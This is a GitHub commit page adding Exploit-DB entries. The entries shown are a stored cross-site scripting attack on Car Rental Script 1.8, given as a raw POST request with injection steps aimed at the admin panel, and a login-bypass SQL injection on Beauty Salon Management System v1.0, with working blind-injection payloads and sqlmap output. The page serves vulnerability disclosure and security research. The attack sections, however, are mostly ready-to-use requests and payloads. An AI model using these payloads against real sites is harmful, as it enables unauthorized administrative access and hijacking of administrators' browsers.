forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
4 changes to exploits/shellcodes/ghdb Beauty Salon Management System v1.0 - SQLi Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS) Car Rental Script 1.8 - Stored Cross-site scripting (XSS) NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi
- Loading branch information
Exploit-DB
committed
Jul 5, 2023
1 parent
ef9b4e5
commit 9461677
Showing
4 changed files
with
243 additions
and
2 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,43 @@ | ||
# Exploit Title: Car Rental Script 1.8 - Stored Cross-site scripting (XSS) | ||
# Date: 30/07/2023 | ||
# Exploit Author: CraCkEr | ||
# Vendor: GZ Scripts | ||
# Vendor Homepage: https://gzscripts.com/ | ||
# Software Link: https://gzscripts.com/car-rental-php-script.html | ||
# Version: 1.8 | ||
# Tested on: Windows 10 Pro | ||
# Impact: Manipulate the content of the site | ||
|
||
Release Notes: | ||
|
||
Allow Attacker to inject malicious code into website, give ability to steal sensitive | ||
information, manipulate data, and launch additional attacks. | ||
|
||
## Stored XSS | ||
----------------------------------------------- | ||
POST /EventBookingCalendar/load.php?controller=GzFront&action=checkout&cid=1&layout=calendar&show_header=T&local=3 HTTP/1.1 | ||
|
||
payment_method=pay_arrival&event_prices%5B51%5D=1&event_prices%5B50%5D=1&event_prices%5B49%5D=1&title=mr&male=male&first_name=[XSS Payload]&second_name=[XSS Payload&phone=[XSS Payload&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload&additional=xxx&captcha=qqxshj&terms=1&event_id=17&create_booking=1 | ||
----------------------------------------------- | ||
|
||
POST parameter 'first_name' is vulnerable to XSS | ||
POST parameter 'second_name' is vulnerable to XSS | ||
POST parameter 'phone' is vulnerable to XSS | ||
POST parameter 'address_1' is vulnerable to XSS | ||
POST parameter 'country' is vulnerable to XSS | ||
|
||
|
||
## Steps to Reproduce: | ||
|
||
1. As a [Guest User] Select any [Pickup/Return Location] & Choose any [Time] & [Rental Age] - Then Click on [Search for rent a car] - Select Any Car | ||
2. Inject your [XSS Payload] in "First Name" | ||
3. Inject your [XSS Payload] in "Last Name" | ||
4. Inject your [XSS Payload] in "Phone" | ||
5. Inject your [XSS Payload] in "Address Line 1" | ||
6. Inject your [XSS Payload] in "Country" | ||
7. Accept with terms & Press [Booking] | ||
XSS Fired on Local User Browser. | ||
8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard) | ||
XSS Will Fire and Executed on his Browser | ||
9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index) | ||
XSS Will Fire and Executed on his Browser |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,75 @@ | ||
# Exploit Title: Beauty Salon Management System v1.0 - SQLi | ||
# Date of found: 04/07/2023 | ||
# Exploit Author: Fatih Nacar | ||
# Version: V1.0 | ||
# Tested on: Windows 10 | ||
# Vendor Homepage: https://www.campcodes.com <https://www.campcodes.com/projects/retro-cellphone-online-store-an-e-commerce-project-in-php-mysqli/> | ||
# Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/ | ||
# CWE: CWE-89 | ||
|
||
Vulnerability Description - | ||
|
||
Beauty Salon Management System: V1.0, developed by Campcodes, has been | ||
found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability | ||
allows an attacker to manipulate login authentication with the SQL queries | ||
and bypass authentication. The system fails to properly validate | ||
user-supplied input in the username and password fields during the login | ||
process, enabling an attacker to inject malicious SQL code. By exploiting | ||
this vulnerability, an attacker can bypass authentication and gain | ||
unauthorized access to the system. | ||
|
||
Steps to Reproduce - | ||
|
||
The following steps outline the exploitation of the SQL Injection | ||
vulnerability in Beauty Salon Management System V1.0: | ||
|
||
1. Open the admin login page by accessing the URL: | ||
http://localhost/Chic%20Beauty%20Salon%20System/admin/index.php | ||
|
||
2. In the username and password fields, insert the following SQL Injection | ||
payload shown inside brackets to bypass authentication for usename | ||
parameter: | ||
|
||
{Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374 | ||
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign | ||
In} | ||
|
||
3.Execute the SQL Injection payload. | ||
|
||
As a result of successful exploitation, the attacker gains unauthorized | ||
access to the system and is logged in with administrative privileges. | ||
|
||
Sqlmap results: | ||
|
||
POST parameter 'username' is vulnerable. Do you want to keep testing the | ||
others (if any)? [y/N] y | ||
|
||
sqlmap identified the following injection point(s) with a total of 793 | ||
HTTP(s) requests: | ||
|
||
--- | ||
|
||
Parameter: username (POST) | ||
|
||
Type: boolean-based blind | ||
|
||
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) | ||
|
||
Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374 | ||
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign | ||
In | ||
|
||
Type: time-based blind | ||
|
||
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) | ||
|
||
Payload: username=admin' AND (SELECT 1468 FROM (SELECT(SLEEP(5)))qZVk)-- | ||
rvYF&password=test&login=Sign In | ||
|
||
--- | ||
|
||
[15:58:56] [INFO] the back-end DBMS is MySQL | ||
|
||
web application technology: PHP 8.2.4, Apache 2.4.56 | ||
|
||
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters